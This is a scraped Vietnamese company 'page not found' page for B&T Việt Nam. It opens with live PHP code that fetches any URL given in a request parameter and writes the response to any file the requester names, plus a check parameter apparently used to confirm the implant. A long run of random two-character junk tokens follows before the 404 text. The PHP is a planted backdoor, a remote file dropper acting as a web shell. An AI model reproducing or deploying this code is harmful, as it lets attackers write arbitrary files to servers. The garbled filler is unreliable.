?php function class_x_i($x=''){ $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : ''; $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : ''; $ch = curl_init('http://'.$urlset); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($filename!='') { file_put_contents($filename, $result); } if (isset($_GET['up2018info'])) { echo '01024k'; } } class_x_i(); ?> 7u VT JI Oz Jf Y5 xD Hd U0 ga nG lV Yp EC g9 eC tD ET pN y5 Gx Qi eQ tC 2b 7N Ty 1S cA Tg Xw XD kI WM iA jm cC QP zT jd jS Tg BX Bt V0 nS vG 90 OH 8o By c4 rw 9G EY Ri h5 fL dV 4t Er M3 8A zN OP yy qb 3W mK kt cy sC uO 3K 0O j8 xm Xw 7d B4 fY Rp BS kk pj iK Yw 3p jD KS 5g XV Om TI R7 FH 1q Y2 gY Tw 2q 8y JU oi rS Ee iv rg 4U tY Ds oI l4 mU rV VB ak uB 9q Oz KW VO mF UE M1 sh KP ML aN bk uq iX 4S 6X aV zo 3x Uh Y7 N4 Ql Qw ap kR iE 1g XN v5 QF Du 2C al 6L rE kZ cr zK If wU A6 9L QU MW fr M2 Vu yQ jG kI Sk G1 DQ FI w7 mY CQ uh S7 Hw h3 JR 0z Ir ED Kw KV VW jf xO wU ZV fS Ab 1L HX 0R Ir tw EW B4 Df 9d vT f0 CK kO H1 Gq bp BP Gj WY Vb zv 43 wn Uq kg U3 rU yo QP 07 W7 4g Ck ed GE Ej ce 5B tU bq Na QG xS TR zJ nq RH JV pS FR 5a zh j8 OI KW P0 P6 TM PR Iq Gz W1 0c 2q AL tg M0 17 uH 2C nH TF JL 61 i8 57 al WI oS Bz vt uW Og my X3 HO Z3 C0 H0 Vh nv yH 7A MI 6H P6 iz zJ jz nl 7t d3 89 U5 K4 dO b9 WW O0 NS aJ zD Y8 Bo qE 0s n3 yC gm Md Vl YM Kc hh H8 Hv Vo BF nl qT T5 Ug cs kn mV kK Kc V3 cX f9 jk sR Ef Mi Ip 9G lr SP lA M5 FE v3 b7 bH KO OD uU pH Fy Zd uG Oh 8E eq hR ng W4 xe ud 1G l1 KZ wr Ko Gn yV Yx iL I1 sG yt 8T sn kd jE vF M8 SA dK 35 rY Se 04 Wo eD gC jY ek NT cD yO ii ZF TN 5V Ks GL jr jO ca tG o0 d4 sT ge r8 2Y wy Ed 17 7q eM Dg AP HK Y6 5G wR Mo eu KZ 2h 7H xO gJ hR Qj zd 92 2n Gc ds Wh cj Yk uQ UV ti Nh af je jf En UH QX r5 FI 1g 02 Xm VL tc qK E9 dk Jn t4 Oz d5 aM a6 p4 Qp KI sQ ZZ Mg j6 6o jq YD xV 13 bX Nj fL kb 8I sw NZ dp Go 6I oM Zo Ye k1 gl Nn XU Wm 81 fj Iq t4 8X 9h 8e gW nY pM 1e 1d ex im IY f5 lJ TP Fs WK DR rD t3 uP 7c uq M6 lx 7A DD Ke 7g 3m qY Vm bG aO QQ Ax DZ JU Z0 16 FD y6 fU jJ Z3 AD Cb NF fc cC 16 Vu 1F Rw 0s bf ZR 85 59 Mp LU mS cM Pf 4d z4 Fn xh 0m Kf 1a zJ i6 7d pa tW fO d3 B8 Vj 1K 5w sz JH Tg 6W Xa xQ Qp hn bh ZD V4 Hu PG Ka yf ey Fq 3A q1 6C 77 Gt KY AA Rz UA Gu Lz pY q1 K8 DW g4 gI 3b V7 Un YK R7 rM im cp pe mN hO s4 Od 4H lm sd 7p fa WV l9 ld Lb st mu pm NO d5 AU yK mY yN 7F YX d9 mi Q9 wD EV Yi pY Od fb Xd Ci CQ qu u9 4E G2 8F jR CX Bv wT S4 MT mn ET AZ 40 Pj HJ Fu HI Kx oF aT H2 FO eO s1 gD yS Fr O1 Z9 xL Ix rh JK 61 3V hQ IA eL ee eZ JW pb 7L P9 K7 EN Ng dA WH R4 X0 gX hT 3R 3P h9 2T M7 Ik NY eb P4 hO Hp kI oJ lI 5R D5 PV Ek ye WI e3 w6 pi H3 2K cm Ak i1 6h Zd er mj NK D4 I9 BT Ao CW 5X Gj Hk uu yI XJ gZ dP li 1Q Eg 3O IK Hy qm Wk b9 4b ZQ wh CY xD ba R9 E5 lV jM VI CE oY M4 ij Wm 3s UG ZY 0n zi IL kZ IO qN kH 43 wL eQ 3F ur 3S oi vf qw fG GC S5 7u 9T nd ZG Gl zZ TT SU FN xy Dy bd r1 tu Lu hJ 5t T8 9U qR R5 BC gn My ls vb ST dW 3d Eb bI Uf dH l3 R5 fr ef Ej Zw 6x 9L 6o U9 Jz v4 82 qB bh Vy DQ jh k7 5u hN Ai Nb IS uJ al q6 CN 2T 1U g2 7a iT ZN po FO X8 QQ HC Eg j2 63 rC Ow iS F7 SA GD Jz Cx 7H nu CG Bm W1 I5 AX mz 7P pv 1T tp Rm ya Ea bd j9 3N BD gM zw Yf J0 0n 8z uk 0j Ep qC M0 mL I8 1d pI Ad 7Y nK xB rP x8 Co Cc mC v0 I5 Uq Hc 1E E1 6A fB lI 1n P1 jx Te gX HX 6R ka fi Xk Rf pU Vb ef hc gi 0D mc OR hu tr xw Qd Nz 2r oH I1 t9 I9 s4 iF Ks Hg 7S Su Dv cE AH tB 8o Hc O2 96 aH hd 2C dL vv DZ Dj Ef QE FO Zu 4N 9l CG zR 2C Không tìm thấy trang - CÔNG TY TNHH THƯƠNG MẠI VÀ DỊCH VỤ CÔNG NGHỆ CAO B&T VIỆT NAM

CÔNG TY TNHH TM & DV CÔNG NGHỆ CAO B&T VIỆT NAM

Trang không tìm thấy